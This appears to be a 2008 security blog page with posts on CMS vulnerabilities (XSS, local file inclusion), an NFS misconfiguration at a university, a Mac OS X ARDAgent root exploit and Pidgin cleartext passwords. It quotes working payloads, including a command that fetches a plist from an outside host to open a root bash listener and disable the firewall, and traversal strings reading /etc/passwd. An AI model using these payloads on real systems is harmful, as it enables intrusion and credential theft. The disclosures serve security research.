header

"There is nothing either good or bad, but thinking makes it so." - Shakespeare

Welcome
38.103.63.62
HTTP <-> HTTPS
Switch to HTTPS
News
Index
Archive of 2008
Texts
Attack
Defense
Advisories
Malicious
Others
Releases
Hacking/Cracking
Administration/Defense
Malicious codes
Exploits
Others
Others
About
Staff
Imprint
Multimedia
Hall of Shame
Best of error.log
Feed
RSS 2.0
Members blogs
SkyOut
Tatsumori
Komarov
Security news/vuln. alerts
Rootsecure
Securiteam
Secunia
Securitytracker
Securityfocus
Gnucitizen
Zone-H
Vuln./exploit databases
OSVDB
Milw0rm
Secwatch
Securityvulns
Packetstorm
Exploitsearch
Virus code databases
Netlux
VX Chaos
Trojanfrance
Blogs (AntiVirus/Security)
F-Secure
Symantec
Avertlabs
Viruslist
ESET
Ha.ckers
Offensive Computing
NewOrder
Rootkit
Electronical magazines
Phrack
(IN)SECURE
K_1ine
bUTCHERED fR0M iNSiDE
Die Datenschleuder
Commercial magazines
Hakin9
2600
Xakep
Affiliated pages
Perforin
SecuMania
Hosting provided by
Nexpa.de
28th - June - 2008 - 02:00

TGS CMS admin page XSS

tgs-cms

I was a bit bored after coming back from work having worked five hours longer then normally, so I decided to look a bit at some Content Management Systems and search for vulnerabilities. Quite fastly I found one in a CMS called TGS, which stands for "The Green Smurf". I set up the CMS on my local machine, being reachable over 127.0.0.1:8080. Then I looked at some files and found two bugs on the admin panel. So first off I had to log in on the following page: cms/login.php, then I was redirected to cms/index.php?site=main and here we have the vulnerabilities:

if (isset($_GET['msg'])) {
?>
<tr><td><center><table align="center"  width="100%" \
border="0" bgcolor="#ffb3b5"><tr><td>
<font class='errorBox'><img border='0' src='images/errorBox.gif'> \
&nbsp;<?php echo $_GET['msg']; ?></font>
</tr></table></center></td></tr>
<?php 
}

And the other one:

if (isset($_GET['msg'])) {
?>
<tr><td><center><table align="center"  width="100%" \
border="0" bgcolor="#05c27d"><tr><td>
<font class='errorBox'><img border='0' src='images/goodBox.gif'> \
&nbsp;<?php echo $_GET['goodmsg']; ?></font>
</tr></table></center></td></tr>
<?php 
}

So, to make this whole thing interesting, make an admin click on a manipulated link when he is logged in and redirect his/her cookie to you! The XSS works like this:

XSS #1: http://.../cms/index.php?site=main&msg=[XSS]

XSS #2: http://.../cms/index.php?site=main&goodmsg=[XSS]

The advisory can be found [here].

27th - June - 2008 - 22:00

APROX CMS ENGINE V5(.1.0.4) LFI

aprox

Some days ago I published an advisory to Milw0rm, that describes a Local File Inclusion bug in a CMS, called Aprox. Let's look at the bug a bit closer. First we have the following code:

if (!isset($_GET["id"]))
{
if ((isset($_GET["page"])) && ($_GET["page"] != "")){
if (file_exists("./engine/inc/".$_GET["page"].".inc")){

So you might still see, what will become the problem: The parameter "page" is taken via a GET call and there is no filtration or evaluation. So let us check what happens with this parameter:

include("./engine/inc/".$_GET["page"].".inc");

WHUPS! It gets included and there are NO checks. That's our time to jump in and manipulate the parameter. Let us put "../../../xampp/xampp-changes.txt" for it (Information: On my Vista machine I don't have a boot.ini anymore, so I test such bugs with the TXT file of Xampp, which I used for testing). The call will fail with the following error:

Fehler - Datei nicht gefunden!

This translates to: "Error - File not found!". That's no wonder, let's look at the whole include call:

include("./engine/inc/../../../xampp/xampp-changes.txt.inc");

This file does not exist of course, but we can make it working by simply appending a terminating NULL byte. Let's do it with "../../../xampp/xampp-changes.txt%00". Now it works and we get the following text:

14. Feb 2008 XAMPP 1.6.6a - Upgrade to MySQL 5.0.51a - ...

That is the text written in the xampp-changes.txt! Now you can do whatever you want to include (locally), like "../../../etc/passwd%00" on Linux/Unix or for Windows "../../../boot.ini%00".

For the whole advisory look [here] or check out [Milw0rm].

27th - June - 2008 - 17:00

(IN)Security of the University of Ulm

uni-ulm

The last weekend I looked closer at the security of the University of Ulm, the one of the city I live in. I have the great advantage, that I have a machine inside the network because I live in a house, that is connected to the universities campus. I scanned the whole network and did some simple tests to check out their systems. One thing made me curious, the server located at ftp.uni-ulm.de or ftp.rz.uni-ulm.de (they are the same). So first of all let's look at this with nslookup:

# nslookup ftp.uni-ulm.de
Server:         134.60.1.111
Address:        134.60.1.111#53

ftp.uni-ulm.de  canonical name = ftp.rz.uni-ulm.de.
Name:   ftp.rz.uni-ulm.de
Address: 134.60.1.5

# nslookup ftp.rz.uni-ulm.de
Server:         134.60.1.111
Address:        134.60.1.111#53

Name:   ftp.rz.uni-ulm.de
Address: 134.60.1.5

As we can see both servers are located at 134.60.1.5. Now let's check this server for open ports:

# nmap -sV -P0 ftp.uni-ulm.de

Starting Nmap 4.53 ( http://insecure.org ) at 2008-06-27 16:42 CEST
Interesting ports on ftp.rz.uni-ulm.de (134.60.1.5):
Not shown: 1700 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 2.0.6
22/tcp   open     ssh          SunSSH 1.1 (protocol 2.0)
80/tcp   open     http         Apache httpd 2.2.4 ((Unix))
111/tcp  open     rpc
119/tcp  open     nntp         Netwinsite DNEWS 5.6f3 (posting OK)
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
445/tcp  filtered microsoft-ds
514/tcp  open     tcpwrapped
873/tcp  open     rsync         (protocol version 30)
2049/tcp open     rpc
4045/tcp open     rpc
Service Info: Host: procyon.rz.uni-ulm.de; OS: Unix

Service detection performed. Please report any incorrect results \
at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.894 seconds

As we can see we got another interesting info here: The server is internally called procyon.rz.uni-ulm.de and it has an open RPC! Now let's check this RPC:

# rpcinfo -p procyon.rz.uni-ulm.de
   program vers proto   port
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32777  status
    100024    1   tcp  32791  status
    100133    1   udp  32777
    100133    1   tcp  32791
1073741824    1   tcp  32792
    100007    3   udp  32780  ypbind
    100007    2   udp  32780  ypbind
    100007    1   udp  32780  ypbind
    100007    3   tcp  32793  ypbind
    100007    2   tcp  32793  ypbind
    100007    1   tcp  32793  ypbind
    100021    1   udp   4045  nlockmgr
    100021    2   udp   4045  nlockmgr
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100021    1   tcp   4045  nlockmgr
    100021    2   tcp   4045  nlockmgr
    100021    3   tcp   4045  nlockmgr
    100021    4   tcp   4045  nlockmgr
    100005    1   udp  32788  mountd
    100005    1   tcp  32794  mountd
    100005    2   udp  32788  mountd
    100005    2   tcp  32794  mountd
    100005    3   udp  32788  mountd
    100005    3   tcp  32794  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100242    1   tcp  32796
    100230    1   tcp  32797
    100011    1   udp  32789  rquotad
    100229    1   tcp  53368
    100229    2   tcp  53368

Interesting, look at port 2049, there is an NFS Service running, in version 2 and 3. So lets check this NFS Share:

# showmount -e procyon.rz.uni-ulm.de
Exports list on procyon.rz.uni-ulm.de:
/campus/install                    .rz.uni-ulm.de
/campus/opensuse                   .uni-ulm.de
/campus/suse                       .uni-ulm.de
/campus/solaris                    .uni-ulm.de
/campus/adsm                       .uni-ulm.de
/ftp			           EVERYONE

Whups... /ftp can be mounted by EVERYONE? Interesting. Now let's mount it:

# mount -t nfs procyon.rz.uni-ulm.de:/ftp /mnt

It worked! Now we have (at least) read-only access to the whole /ftp directory of the Sun Solaris 10 server. I did not look to deep into the directory, but there are folders like: apache, apache-extra, vsftpd and more... I think this was not expected to happen and so I informed the helpdesk of the university about this problem! I got in contact with a friendly guy who was quite shocked about, what I found out and asked me to not do anything malicious. I told him I won't and suggested him to fix this. He did and now look at the exports list again:

# showmount -e procyon.rz.uni-ulm.de
Exports list on procyon.rz.uni-ulm.de:
/ftp/beta                          .rz.uni-ulm.de
/campus/install                    .rz.uni-ulm.de
/campus/opensuse                   .uni-ulm.de
/campus/suse                       .uni-ulm.de
/campus/solaris                    .uni-ulm.de
/campus/adsm                       .uni-ulm.de
/ftp/ftpdata                       urzunix

Now it's fixed and the University of Ulm is a bit more secure again!

27th - June - 2008 - 00:30

Code Injection?

Today a friend of mine sent me a PHP script, for which he wanted to know if it is vulnerable to SQL Injection as he goes deeper into that topic at the moment. I looked at the script and was quite sure, that SQL Injection won't work because of the following reason: The password gets hashed with MD5 (using the md5() function of PHP). Look at the code:

[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]

As you can see the command gets executed, but why? Simple answer: Because of the backticks! So if we would choose a system command for the $passwort variable in the script, then that command would get executed. In our special case it did not work, but why? That can have several reasons, one could be, that magic_quotes_gpc is set to "on", which MIGHT forbid this or maybe other special options in the servers php.ini file are set, that forbid such actions... The script per se is vulnerable, only the server config secures it.

UPDATE: A dude I know from the last PH-Neutral informed me about a great mistake I did and flamed a bit on me *smile* ... His name is Joern or Joernchen and he pulled my attention to the manual of PHP, especially the function md5(), which I talked of before.

Beschreibung
string md5 ( string $str [, bool $raw_output ] )

Berechnet den MD5-Hash von str unter Verwendung des RSA Data Security,
Inc. MD5 Message-Digest Algorithm und gibt das Ergebnis zurück.

Which translates to: Calculates the MD5-Hash of str by using the RSA Data Security, Inc. MD5 Message-Digest Algorithm and returns the result.

Conclusion: NO CODE INJECTION, but how about using the variable $anmeldename and fill it with this: 1' ; insert into [table] hacker,md5(hacker) --... Have fun! Thanks for help!

UPDATE 2: I was emailed and messaged by different people about the first UPDATE I did on this topic. I have to say sorry for the wrong information I gave, mysql_query does NOT support stacked query. Furthermore I have to say, that mysql_multi_query or multi_query does, but that has not been used in our special case. Hope this has been the last update on this news *smile*.

23rd - June - 2008 - 19:00

Crazy reverse engineering

I got an email by Tatsumori, with some very funny and fresh news on the topic of RE (Reverse Engineering), read it yourself:

Some of you may know that I work as a research engineer and
get to deal with fresh malware on a regular basis. Those of
you who either work in the security sector or take part in
the good old AV vs. VX vs. Blackhats challenge will also know
that stepping through a piece of malcode isn't really the same
as disassembling winmine.exe. Apart from the fact that most
people who actually release malware into the wilderness just
can't be convinced to include debugging information (come on
guys, be "1337") we today face a lot of techniques that
were specially designed to make an analyst's life harder.

Most notably we face Anti-Debugging and Anti-Reversing. (And
of course anti-anti-anti-foo... the list goes on.) Then there
are some other techniques that aren't directly geared towards
researchers but try to accomplish something else, like for
example escalating privileges or circumventing the firewall.
I'm not going into detail here either, but everyone who has a
shortcut for "launch notepad.exe in OllyDBG, break on new thread
and dump the process id to a file" should know what I mean.

And then there are those moments where you just want to shout,
because someone invented something completely new. Some days ago
I was facing some good malware. The name may not be mentioned, so
let's just call it "XY" for clarity's sake. XY pulled about every
trick in the book, including - among others - indirect calls,
process injection, debugger detection and encryption. Those
could be defeated using some careful engineering and lots of
coffee. Somewhere in the code I ran into this statement
(obfuscated):

-=ASM=-
push ebp
call loc_XYZ
pop ebp
-=/ASM=-

This is something we see almost every day. A regular internal function
call. By quickly checking over XYZ, I could see that it contained a
lot of crypto-foo. Thus I tried to see what it changed before going
into more detail and decided to step over the function.
Interestingly enough, the malware crashed with a memory violation.
Now that is not very unusual either, since anti-debugging techniques
tend to lead to this result, but just to make sure, I loaded a snapshot
and hit F9 from the same spot. But while it should have crashed again
right then, it just exited gracefully. I decided to set a breakpoint
on pop ebp manually, to check if this was a bug in the debugger. The
results were the same as when stepping over. The malware crashed.
This began to make me confused. But it still had to get a little worse.
I removed the software breakpoint on pop ebp and replaced it with a
hardware breakpoint. Now the program didn't crash, but it didn't stop
either. It just ran through.

Confused enough yet? Bear with me for another minute.

I couldn't figure this one out. And luckily lunch-break came up quickly.
While returning to the office, two of my coworkers were arguing over
which way to walk. "This way is more direct" "This one is faster" "But
I need to go to that store". Suddenly something in my brain shifted.
When we arrived at the office, I was soon bent over laughing.

What happened?
Their conversation was the missing piece. It made me realize one
essential fact: loc_XYZ never returned the flow of execution to
the calling function at all. Whoever wrote this used the function
call like a jmp instruction. It was a one way path. Later during
the analysis I was able to discover a piece of code, that then
checked if "pop ebp" had been modified. By setting a software
breakpoint and stepping over, "pop ebp" had become "CC CC". The
malware noticed this and faked a crash to hinder the analysis. This
also explained why running the malware and setting a hardware
breakpoint didn't do anything. push ebp remained unchanged.

Sometimes we need to keep our eyes open for new possibilities. To my
friends from the AV: Good luck on generating a working fingerprint
for this one.

Original post: [observed.de].

22nd - June - 2008 - 22:45

Owning Mac OS X

applesymbol

It is not the first time I read about the new "Mac OS X Root Exploit", but people are talking more and more about it even Heise has now printed news on this exploit. The problem is present in the ARDAgent of Mac OS X 10.4 and 10.5, which stands for Apple Remote Desktop and is part of the remote management of Apple computers. The ARDAgent has a SUID-Bit set and furthermore you can launch AppleScript code over the agent, which will then be started as root. The exploit works if you have physical access to a machine or can type in a console, for example having remote access via SSH to a server. On Slashdot an example "exploit" has been posted, looking like this:

osascript -e 'tell app "ARDAgent" to do shell script
"cd /System/Library/LaunchDaemons ; curl -o bash.plist
http://cdslash.net/temp/bash.plist [cdslash.net] ;
chmod 600 bash.plist ; launchctl load bash.plist ;
launchctl start com.apple.bash ; ipfw disable firewall;
launchctl"'

The bash.plist file looks like the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" \
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Disabled</key>
	<false/>
	<key>Label</key>
	<string>com.apple.bash</string>
	<key>Program</key>
	<string>/bin//bash</string>
	<key>ProgramArguments</key>
	<array>
		<string>bash</string>
		<string>-i</string>
	</array>
	<key>inetdCompatibility</key>
	<dict>
		<key>Wait</key>
		<false/>
	</dict>
	<key>Sockets</key>
	<dict>
		<key>Listeners</key>
		<dict>
			<key>SockServiceName</key>
			<string>9999</string>
			<key>Bonjour</key>
			<false/>
		</dict>
	</dict>
</dict>
</plist>

One way to solve this problem would be to delete the SUID-Bit of the ARDAgent by typing "chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent".

21st - June - 2008 - 06:30

Takedown

takedown

After a long hacksession this night, which will continue now, I watched the movie Takedown, which tells the story of Kevin Mitnick. The movie is known to be not very realistic, but nevertheless it is very popular and in my oppinion a very nice movie. It shows different aspects of the hacker subculture, that you still can find nowadays. What I mean actually? I would have to go to deep into personal things relating the german subculture... Think about yourself! A short description:

The hacker Kevin David Mitnick hacks into a system called SAS, which
stands for Switched Access Control and is a service of the Southern
California telephone company to the FBI, so that they are able to listen
to every phone call. Because of this hack he has to run away from the
agents and more then two years he does not get caught. The most time of
the movie Kevin Mitnick virtually "fights" against the computer expert
Tsutomu Shimomura, who works for the Super Computer Center in San Diego.
They even one time meet, but Kevin is able to flee. Kevin gets access to
the computer of Tsutomu and downloads a directory called "contempt",
which he finds out is a virus...

Remember: The movie is UNREALISTIC (but nice!).

20th - June - 2008 - 21:30

BackTrack 3.0 Final released

remote-exploit

After a long time of developing BackTrack in its new version, finally the third version of it has been released. It features three versions now. A CD version as always, an USB version and a VMWare image. The kernel is 2.6.21.5 and a lot of new cool stuff has been added, such as SAINT in a specially licensed version for BackTrack. Very nice! I can only suggest you clearly to download the version, that fits to your needs and start playing:

Description: CD Image
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Be patient! At the moment the servers are totally overloaded (how about Torrents in future?)!

19th - June - 2008 - 00:30

Pidgin (In)Security

pidgin

Pidgin is available in version 2.4.2 at the moment. It is an instant messaging program, that is available for many different operating systems and supports many chat protocols, such as ICQ, MSN, Jabber, IRC, Silc and many many more. It is a great program, no question, BUT and here comes, what I will criticize now: It has a major insecurity! All the informations of Pidgin are written to a directory called ".purple". The most important files there are: accounts.xml and blist.xml. What are those files for? Accounts.xml saves the login informations for your installed accounts, as the name says... and blist.xml contains all your contacts, those on your local buddylist and those, that are only saved serverside! All this is still no problem at all, BUT: ALL INFORMATIONS ARE SAVED CLEARTEXT!

On Linux/Unix/BSD etc... operating systems you can find the folder .purple in your homefolder, on Windows (Vista) it is saved in C:\Users\...\AppData\Roaming. So let's look at those files:

<?xml version='1.0' encoding='UTF-8' ?>
<purple version='1.0'>
<blist>
<group name='Buddies'/>
<group name='MSN_2'>
<setting name='collapsed' type='bool'>0</setting>
<contact>
<buddy account='*' proto='prpl-msn'>
<name>*@*.*</name>
<alias>*</alias>
<setting name='buddy_icon' type='string'>*.png</setting>
<setting name='icon_checksum' type='string'>*</setting>
<setting name='last_seen' type='int'>*</setting>
</buddy>
</contact>
[...]

Okay, thats how the blist.xml file is build, not THAT interesting so far, but now comes the shock: Look at accounts.xml:

<?xml version='1.0' encoding='UTF-8' ?>
<account version='1.0'>
<account>
<protocol>prpl-icq</protocol>
<name>300852578</name>
<password>*</password>
<alias>SkyOut</alias>
[...]
<account>
<protocol>prpl-msn</protocol>
<name>rooter05@freenet.de</name>
<password>*</password>
<alias>SkyOut</alias>
[...]
<account>
<protocol>prpl-jabber</protocol>
<name>cr3x@jaim.at/0x00</name>
<password>*</password>
<alias>SkyOut</alias>
[...]

If it would be written like this, all would be fine, but instead of * you can see the password in CLEARTEXT! This is a major insecurity. Everyone having access to the computer could read your passwords easily + your buddylist. The scenario is the following: You get infected by a virus. The virus targets Pidgin and reads out your passwords, then it reads your buddy list and sends instant messenger silently over your accounts to your contacts. Those contacts will trust this instant message because it is from a "friend" of them and they won't see, that it is an auto-generated message done by a virus. A worm would be a easily possible.

We are in the 21st century and computer security should be far more better then saving passwords cleartext. I don't know why the authors of Pidgin are still using this old technique of saving informations... At least a hashed value should be done... To proove the risk of such an insecure usage I coded a tool in Ruby called [pidgindump.rb], that will read out the informations for ICQ, MSN and Jabber accounts. You can find it in "Releases" -> "Others"!

I hope for other people blogging about this and giving the authors of Pidgin a big black press, so they will change it soon!

18th - June - 2008 - 17:30

Firefox 3 and Wine 1.0

firefox

After a long time of development finally Firefox 3 has been released with more then 15.000 big or small changes and improvements. It is said to be faster and should need less memory. The bookmarks management is now based on a database, which makes it easier to find and manage bookmarks. If you have multiple tabs open you can now smoothly scroll between them. In my opinion the most interesting changes have been done on the Mac OS X side of Firefox. Instead of using the old Carbon libraries, Firefox is now using Cocoa, which makes it far more efficient and ready for 64 Bit! One negative thing has to be said here anyway: In the [Acid3 Test] Firefox 3 scores with 71/100, which could be better, but let's see if this gets improved soon in Firefox 3.1. Furthermore the CSS 3 compatibility is not as good as in Opera 9.5. But apart from that Firefox 3 is a great step in the right direction!

Download Firefox 3 on [mozilla.com/firefox]!

wine

After 15(!) years of development and beta testing Wine has been released in its final version, called Wine 1.0! Of course this does not mean, that development will stop now, but it is a big step in the right direction and thousands of applications are perfectly supported as you can read in the [Wine Application Database (AppDB)]. The source code for Wine 1.0 is now available on [sourceforge.net]. The binary packages should follow as soon as their maintainers make them available!

16th - June - 2008 - 09:30

Phishmarket :: gov && mil :: 2008

In the tradition of the first and second Phishmarkt a new one is going to be released NOW! The first time we announced the Phishmarkt in Octobre 2006, called Phishmarkt :: de :: en ::, which showed vulnerabilities in about 70 german online banking sites and about 50 other sites, like universities or other online present companies. This first Phishmarkt was available in two different languages, in german, as it can be found [here] and in an [english version]. It was a great success and most of the sites fixed the problem, some earlier, some later and some (blame them!) never! After a few months, the second Phishmarkt followed, called [Phishmarkt :: at ::] because it showed vulnerabilities in austrian bank sites. This project has been done due to the fact, that austrian banks announced they would be secure: They were not!

So enough of history for now. Here comes the new Phishmarkt! Called Phishmarkt :: gov && mil :: 2008. All in all 47 vulnerable governmental institutions are listed and 8 military websites, that are attackable through XSS (in our case: IFrame Spoofing). Here comes the TOP 5 of the websites being shown to be vulnerable:

Place 1 goes to: cia.gov
Place 2 goes to: gmao.gsfc.nasa.gov
Place 3 goes to: cdmrp.army.mil
Place 4 goes to: www.onr.navy.mil
Place 5 goes to: I couldn't decide... xP

Yes, you read right: CIA.gov! Unbelievable, but true...

I will send information about this new project to several sites now and hope for their support in making this public and giving those sites a black press!

And finally, check it out: [baseportal.com/baseportal/phishmarkt/commix]!

15th - June - 2008 - 23:30

ShmooCon 2008 videos online

shmoocon

The videos of the years ShmooCon event are now finally online. You can find them on [shmoocon.org/2008/videos]!

13th - June - 2008 - 17:30- #permalink

When the AV gets XSSed

xssed

Sometimes XSS bugs are really nice, for example if they hit major security companies worldwide like it now happened. McAfee and Symantec have been hit by several XSS bugs, that are so simple often enough, that you wonder, why they made those mistakes while coding the page... Shouldn't they at least be secure?

On XSSed.com you can find the news about it: [link]!

EXAMPLES

McAfee: ---
http://mastdb3.mcafee.com/VirusMap3.asp?ft=
"><script>alert(/XSS/)</script>

http://us.mcafee.com/root/product.asp?productid=sa&cid=
"><script>alert('TreX')</script>
---

Symantec: ---
https://www-secure.symantec.com/custserv/cgi-bin/
cs_privacy_dyn.cgi?first_name="><script>alert(/XSS/)</script>

http://securityresponse.symantec.com/security_response/
detected_writeup.jsp?name=<script>alert(document.cookie)</script>
---
13th - June - 2008 - 16:30

Comparing two directories by hash

Not long ago a friend of mine (Rembrandt) asked me for a little Ruby script I shall code for him. The idea was the following. He has found a bug in a router firmware, that could allow remote code execution, now he was interested in knowing if the attackable file was used in other firmwares of this vendor as well. To do this he had the following idea in mind: You take two directories, the vulnerable firmware directory and a directory of the firmware to be compared to. Now you index both directories files by a hash value (using MD5 in this case) and compare the files to each other. If two files (or better to say: their MD5 hashes) are the same and the first one is the vulnerable file, then you can be quite sure, that the bug is also present in the other firmware. To automate this whole process I coded a Ruby script, that compares two directories recursively.

It is a very special case, but it can be useful and helpful, in "Releases" -> "Others" you can find the the tool called [dir2md5.rb]. Enjoy!

12th - June - 2008 - 07:00

Diashows of images online

Another nice gadget for you: In the section "Multimedia" -> "Images" you can now choose between downloading the whole files all at once (not suggested anymore!) and watching a diashow of the images created with JAlbum 8.0 (suggested!). I hope you like this, the style is dark-silver and should fit to our website quite well...

11th - June - 2008 - 16:30

New section: Videos

After some days of inactivity, which I would like to say sorry for, but I had several personal things to solve first, I would like to announce a new section in Wired Security, called Videos. If you look to the left menu you won't find the link "Images" any longer, but instead of this you can see a link called "Multimedia", which features Images and Videos, in future maybe Audio as well, but that depends. To start off I published three videos for you.

24c3: VX - The Virus Underground by SkyOut

PH-Neutral 0x7d8 Video #1

PH-Neutral 0x7d8 Video #2

To save bandwidth please use the links to GoogleVideo!

04th - June - 2008 - 22:30

MSN/ICQ Phishing

A new phishing wave seems to circulate against people chatting through ICQ and MSN. In the last days I got several messages just telling me a link to a website or by adding something like "look at the photos of me [link]". The websites are normally subdomains of c0mpics.info, which shows up the following login screen when you surf to it:

pics_for_msn_friends

If you click on "Click here to Login with ICQ" you will see the following (quite similar):

pics_for_icq_friends

I don't know why people click on that... Those sites are not trustworthy and not even illegal as it seems because you accept the terms and conditions, which clearly say the following:

We may temporarily access your MSN account to do a combination
of the following:
1.  Send Instant Messages to your friends promoting this site.
2.  Introduce new entertaining sites to your friends via Instant
    Messages.

I have not tried to login and don't know if there is really an image hosting behind all this, but those advertising messages suck and maybe in future this site might be used for more malware like actions, but it's just a theory. Anyway I just wonder why people type in their credentials so freely without thinking about it... Just some extended information of the whois:

IP Address: 210.56.53.224
IP Location: Hong Kong
Website Status: active
Server Type: lighttpd/1.4.19
Cache Date: 2008-06-04 12:14:07 MST

And the website is hosted by:

Name: Jeff Fisher
Organization: TST Management, Inc
Address 1: Edificio Magna Corp. 5th Floor
City: Panama City
State: Panama
Zip: 0000
Country: PA
Phone: +507.2021577

Sorry, but this does not look very trustworthy to me!

04th - June - 2008 - 21:15

June defacements

Long time no news. I have to say sorry for that, but due to the fact I had several personal problems I was unwilling to update the site and was not much at my computer and not very motivated to do anything IT related. But here I am, back again and hopefully things will solve soon!

Well... What happened in the end of May and the beginning of June? Many interesting defacements come to my mind reading through Heise.de/Security. First off we have the Comcast-Hack. The american telecommunications company Comcast has been hacked by some hackers, two to be numbered, called Defiant and EBK of the hacker group Kryogeniks. The hackers manipulated the website in a way, that the DNS name resolution for the Comcasts website pointed to servers controlled by the two guys. In an interview they say it was quite tricky to do this because of the immense amount of data coming in and they had to change the servers again and again to new ones and stood up the whole night. At least Defiant has also a Myspace profile and the police is looking for them. Both are still young, about 18-19 years old and this was a somehow naive action, that will now lead to real problems for them. Cool thing, but wrongly done...

The next hack was done on the 30th of May against the website of our loved minister for inner security: Wolfgang Schäuble (www.wolfgang-schaeuble.de)! After not long ago a reflected XSS was found in the website, attackers were able to manipulate the website all over and make their text show up on the main page when you open the website. Take a look at the photo of the defacement:

wolfgang_schaeuble_hacked

It is expected, that the hack was able due to a SQL Injection vulnerability in modules of the content management software TYPO3. What I very much like about this theory: If this is true, then there was no need for any "hacking tools" and still the attackers were able to deface the website. That shows perfectly how unlogical the law against those tools is!

phoenix_mars_mission

The last hack has been done against websites of the mars mission Phoenix. Several subdomains of the main domain have been manipulated and defaced. What I even more like is the statement by Heise.de/Security: "Hilfreich können dabei auch die frei verfügbaren Scanner für SQL-Injection-Lücken wie Absinthe, SQLNinja, oder SQLix vom Open Web Application Security Project (OWASP) sein.", which translates to: "Helpful can be the freely available scanner for SQL injection vulnerabilities such as Absinthe, SQLNinja or SQLix of the Open Web Application Security Project (OWASP).". Hold on... Did Heise suggested us to use "hacking tools"? You see: To defend yourself you MUST use the tools of the attackers otherwise you will never know what's going on with your page from the attackers point of view. Another perfect example why the german law is STUPID!

Tools expected by Heise can be found here:

Absinthe
=> http://www.0x90.org/releases/absinthe/download.php

SQLNinja
=> http://sqlninja.sourceforge.net/

SQLix
=> http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
Copyright © 2008 by SkyOut (Marcell Dietl)